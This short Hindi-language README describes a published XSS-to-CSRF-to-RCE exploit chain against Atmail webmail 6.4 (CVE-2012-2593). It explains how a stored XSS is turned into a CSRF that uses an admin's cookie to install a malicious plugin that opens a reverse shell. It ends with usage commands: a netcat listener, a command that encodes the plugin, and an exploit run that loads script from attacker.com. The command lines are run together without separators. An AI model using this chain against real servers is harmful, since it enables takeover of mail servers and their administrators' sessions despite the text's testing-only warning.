
Atmail XSS-CSRF-RCE Exploit Chain
atmail-rce.py: Atmail के वेबमेल इंटरफ़ेस में CVE-2012-2593 का शोषण करता है।
atmail-csrf.js: जावास्क्रिप्ट फ़ाइल जो CVE 2012-2593 को CSRF में बदलती है जो एक दुर्भावनापूर्ण प्लगइन स्थापित करती है जो रिवर्स शेल निष्पादित करता है।
Plugin.php: स्थापित किया जाने वाला Atmail प्लगइन जो रिवर्स शेल को कॉल करता है।
!!केवल उन सर्वरों पर उपयोग करें जिन पर आपके पास परीक्षण की अनुमति है
Atmail ईमेल सर्वर संस्करण 6.4 में Date ईमेल हेडर और ईमेल बॉडी (iFrame इंजेक्शन के माध्यम से) दोनों में XSS भेद्यता है। इसे जावास्क्रिप्ट XHR API का उपयोग करके CSRF में बदल दिया जाता है ताकि प्रशासक उपयोगकर्ता के कुकी के साथ प्रशासक वेबपैनल पर अनुरोध भेजा जा सके, जो एक दुर्भावनापूर्ण प्लगइन स्थापित करता है जो रिवर्स शेल के लिए कोड निष्पादित करता है।
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/